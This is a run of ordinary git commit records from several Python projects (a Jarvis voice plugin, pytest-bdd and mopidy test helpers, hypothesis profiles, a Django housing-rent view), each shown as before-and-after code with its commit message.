@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
Add plugins for talking faster and slowerfrom plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) | <commit_before>from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
<commit_msg>Add plugins for talking faster and slower<commit_after>from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
# TODO: Add a message if voice is disabled
@plugin('talk faster')
def talk_faster(jarvis, s):
jarvis.change_speech_rate(25)
@plugin('talk slower')
def talk_slower(jarvis, s):
jarvis.change_speech_rate(-25) |
cbabdf4210313f934ae90d9a853834d9494b3ad5 | tests/conftest.py | tests/conftest.py | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
| import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| Add configuration to collect types from pytest runs | Add configuration to collect types from pytest runs
| Python | mit | pytest-dev/pytest-bdd | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
Add configuration to collect types from pytest runs | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| <commit_before>import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
<commit_msg>Add configuration to collect types from pytest runs<commit_after> | import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
Add configuration to collect types from pytest runsimport pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
| <commit_before>import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
<commit_msg>Add configuration to collect types from pytest runs<commit_after>import pytest
from tests.utils import PYTEST_6
pytest_plugins = "pytester"
def pytest_generate_tests(metafunc):
if "pytest_params" in metafunc.fixturenames:
if PYTEST_6:
parametrizations = [
pytest.param([], id="no-import-mode"),
pytest.param(["--import-mode=prepend"], id="--import-mode=prepend"),
pytest.param(["--import-mode=append"], id="--import-mode=append"),
pytest.param(["--import-mode=importlib"], id="--import-mode=importlib"),
]
else:
parametrizations = [[]]
metafunc.parametrize(
"pytest_params",
parametrizations,
)
# TODO: Remove these before merge
def pytest_collection_finish(session):
"""Handle the pytest collection finish hook: configure pyannotate.
Explicitly delay importing `collect_types` until all tests have
been collected. This gives gevent a chance to monkey patch the
world before importing pyannotate.
"""
from pyannotate_runtime import collect_types
collect_types.init_types_collection()
@pytest.fixture(autouse=True)
def collect_types_fixture():
from pyannotate_runtime import collect_types
collect_types.start()
yield
collect_types.stop()
def pytest_sessionfinish(session, exitstatus):
from pyannotate_runtime import collect_types
collect_types.dump_stats("type_info.json")
|
2f1d32ba80816e3880a464a63d8f3f549a2be9e2 | tests/__init__.py | tests/__init__.py | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
| import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| Add IsA helper to tests to provde any_int, any_str and any_unicode | Add IsA helper to tests to provde any_int, any_str and any_unicode
| Python | apache-2.0 | bencevans/mopidy,diandiankan/mopidy,ZenithDK/mopidy,vrs01/mopidy,liamw9534/mopidy,dbrgn/mopidy,swak/mopidy,jodal/mopidy,SuperStarPL/mopidy,jmarsik/mopidy,bacontext/mopidy,woutervanwijk/mopidy,ali/mopidy,pacificIT/mopidy,woutervanwijk/mopidy,quartz55/mopidy,jmarsik/mopidy,dbrgn/mopidy,mokieyue/mopidy,bencevans/mopidy,mokieyue/mopidy,glogiotatidis/mopidy,adamcik/mopidy,hkariti/mopidy,tkem/mopidy,kingosticks/mopidy,rawdlite/mopidy,jodal/mopidy,mopidy/mopidy,adamcik/mopidy,jcass77/mopidy,jmarsik/mopidy,abarisain/mopidy,rawdlite/mopidy,mopidy/mopidy,swak/mopidy,jmarsik/mopidy,quartz55/mopidy,bencevans/mopidy,priestd09/mopidy,tkem/mopidy,SuperStarPL/mopidy,glogiotatidis/mopidy,glogiotatidis/mopidy,ali/mopidy,hkariti/mopidy,glogiotatidis/mopidy,pacificIT/mopidy,rawdlite/mopidy,ali/mopidy,priestd09/mopidy,kingosticks/mopidy,priestd09/mopidy,vrs01/mopidy,ZenithDK/mopidy,SuperStarPL/mopidy,pacificIT/mopidy,bacontext/mopidy,adamcik/mopidy,jcass77/mopidy,swak/mopidy,liamw9534/mopidy,vrs01/mopidy,ZenithDK/mopidy,mokieyue/mopidy,quartz55/mopidy,dbrgn/mopidy,jodal/mopidy,quartz55/mopidy,vrs01/mopidy,hkariti/mopidy,bacontext/mopidy,diandiankan/mopidy,bacontext/mopidy,abarisain/mopidy,kingosticks/mopidy,ZenithDK/mopidy,diandiankan/mopidy,diandiankan/mopidy,SuperStarPL/mopidy,tkem/mopidy,rawdlite/mopidy,hkariti/mopidy,jcass77/mopidy,dbrgn/mopidy,bencevans/mopidy,pacificIT/mopidy,mopidy/mopidy,tkem/mopidy,mokieyue/mopidy,ali/mopidy,swak/mopidy | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
Add IsA helper to tests to provde any_int, any_str and any_unicode | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| <commit_before>import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
<commit_msg>Add IsA helper to tests to provde any_int, any_str and any_unicode<commit_after> | import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
Add IsA helper to tests to provde any_int, any_str and any_unicodeimport os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
| <commit_before>import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
<commit_msg>Add IsA helper to tests to provde any_int, any_str and any_unicode<commit_after>import os
try: # 2.7
# pylint: disable = E0611,F0401
from unittest.case import SkipTest
# pylint: enable = E0611,F0401
except ImportError:
try: # Nose
from nose.plugins.skip import SkipTest
except ImportError: # Failsafe
class SkipTest(Exception):
pass
from mopidy import settings
# Nuke any local settings to ensure same test env all over
settings.local.clear()
def path_to_data_dir(name):
path = os.path.dirname(__file__)
path = os.path.join(path, 'data')
path = os.path.abspath(path)
return os.path.join(path, name)
class IsA(object):
def __init__(self, klass):
self.klass = klass
def __eq__(self, rhs):
try:
return isinstance(rhs, self.klass)
except TypeError:
return type(rhs) == type(self.klass)
def __ne__(self, rhs):
return not self.__eq__(rhs)
def __repr__(self):
return str(self.klass)
any_int = IsA(int)
any_str = IsA(str)
any_unicode = IsA(unicode)
|
4ef14e5c791fbced79474e82a4268fb15d1c7854 | tests/conftest.py | tests/conftest.py | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| Add a “lots” Hypothesis profile (max_examples=100_000) | tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.
| Python | artistic-2.0 | ppb/ppb-vector,ppb/ppb-vector | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky. | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| <commit_before>def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
<commit_msg>tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.<commit_after> | def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
| <commit_before>def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
<commit_msg>tests: Add a “lots” Hypothesis profile (max_examples=100_000)
This is useful when testing that a new test is (likely) not flaky.<commit_after>def setup_hypothesis():
from hypothesis import settings, Verbosity
settings.register_profile("lots", max_examples=100_000)
settings.register_profile("ci", max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
setup_hypothesis()
|
cf9012ff2f6bf745d46f35923f95b6ce0b9d91e1 | homeful/views.py | homeful/views.py | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
| from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| Add zipcode filter for MFPs. | Add zipcode filter for MFPs.
| Python | mit | happyhousing/happyhousing | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
Add zipcode filter for MFPs. | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| <commit_before>from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
<commit_msg>Add zipcode filter for MFPs.<commit_after> | from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
Add zipcode filter for MFPs.from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
| <commit_before>from django.shortcuts import render
import logging
